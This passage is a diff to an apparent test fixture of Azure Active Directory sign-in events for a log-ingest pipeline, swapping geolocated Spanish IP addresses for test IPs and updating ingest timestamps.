@@ -7819,7 +6784,7 @@
 "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Redirect",
@@ -7869,7 +6834,7 @@
 "asr"
 ],
 "ip": [
- "79.159.10.151"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -7881,12 +6846,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051707300Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"f100d714-ffa2-4077-bf90-2f57a3b366c0\",\"InterSystemsId\":\"b744259e-13e0-43d7-9f56-82cdbd54cf7c\",\"IntraSystemId\":\"ce9f104d-1a1b-488e-9313-b9729e99c400\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970366400Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"f100d714-ffa2-4077-bf90-2f57a3b366c0\",\"InterSystemsId\":\"b744259e-13e0-43d7-9f56-82cdbd54cf7c\",\"IntraSystemId\":\"ce9f104d-1a1b-488e-9313-b9729e99c400\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -7925,22 +6890,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 16299, - "organization": { - "name": "XFERA Moviles S.A." - } - }, - "ip": "37.29.234.179" + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" 
@@ -7954,7 +6904,7 @@
 "ObjectId": "Unknown",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "37.29.234.179",
+ "ActorIpAddress": "67.43.156.14",
 "ExtendedProperties": {
 "KeepMeSignedIn": "True",
 "ResultStatusDetail": "Redirect",
@@ -8004,7 +6954,7 @@
 "asr"
 ],
 "ip": [
- "37.29.234.179"
+ "67.43.156.14"
 ]
 },
 "organization": {
@@ -8016,12 +6966,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "37.29.234.179", - "ip": "37.29.234.179" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-06-17T07:32:46.051710Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4b0f0d57-0766-4621-8aa0-04b8d8b63a78\",\"InterSystemsId\":\"b7d9a234-9fdd-4e36-9cf3-fd825f22697a\",\"IntraSystemId\":\"49092519-a590-4207-b1b3-1d49f9100a00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970372200Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4b0f0d57-0766-4621-8aa0-04b8d8b63a78\",\"InterSystemsId\":\"b7d9a234-9fdd-4e36-9cf3-fd825f22697a\",\"IntraSystemId\":\"49092519-a590-4207-b1b3-1d49f9100a00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -8060,25 +7010,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -8092,7 +7024,7 @@
 "ObjectId": "00000003-0000-0000-c000-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Redirect",
@@ -8142,7 +7074,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -8154,12 +7086,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051712700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:38\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8d9a1fa8-7b85-4c5d-9e96-5728d572fb95\",\"InterSystemsId\":\"bb677f9e-953a-4bde-bb91-0ef8209200a1\",\"IntraSystemId\":\"1da3c318-642f-48dc-836b-e83b27655b00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970377900Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:38\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8d9a1fa8-7b85-4c5d-9e96-5728d572fb95\",\"InterSystemsId\":\"bb677f9e-953a-4bde-bb91-0ef8209200a1\",\"IntraSystemId\":\"1da3c318-642f-48dc-836b-e83b27655b00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -8198,25 +7130,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -8230,7 +7144,7 @@
 "ObjectId": "00000003-0000-0000-c000-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "213.97.47.133",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "True",
 "ResultStatusDetail": "Redirect",
@@ -8280,7 +7194,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -8292,12 +7206,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051715500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"9756fe5b-ea0d-42fa-a665-be8e0eb100e5\",\"InterSystemsId\":\"c355f078-53d7-4d60-b836-851a09a98208\",\"IntraSystemId\":\"20e56367-e902-4200-855b-2ef7b99e5f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970383500Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"9756fe5b-ea0d-42fa-a665-be8e0eb100e5\",\"InterSystemsId\":\"c355f078-53d7-4d60-b836-851a09a98208\",\"IntraSystemId\":\"20e56367-e902-4200-855b-2ef7b99e5f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -8336,25 +7250,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -8368,7 +7264,7 @@
 "ObjectId": "Unknown",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "True",
 "ResultStatusDetail": "Redirect",
@@ -8418,7 +7314,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -8430,12 +7326,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051718200Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d\",\"InterSystemsId\":\"c5874ff2-7c53-4d51-9252-7abbf0524b1c\",\"IntraSystemId\":\"3188aef9-6b4e-44f2-8455-c28b49552200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970389Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d\",\"InterSystemsId\":\"c5874ff2-7c53-4d51-9252-7abbf0524b1c\",\"IntraSystemId\":\"3188aef9-6b4e-44f2-8455-c28b49552200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -8474,25 +7370,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -8506,7 +7384,7 @@
 "ObjectId": "00000003-0000-0000-c000-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "True",
 "ResultStatusDetail": "Redirect",
@@ -8556,7 +7434,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -8568,12 +7446,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051720900Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d137a5e4-7004-493a-acca-5fb167d1f207\",\"InterSystemsId\":\"cf2168a1-6537-4ed6-80a5-797c3458180c\",\"IntraSystemId\":\"23f53edd-63a7-4292-9d80-4fbc49c11e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970394600Z", + "original": 
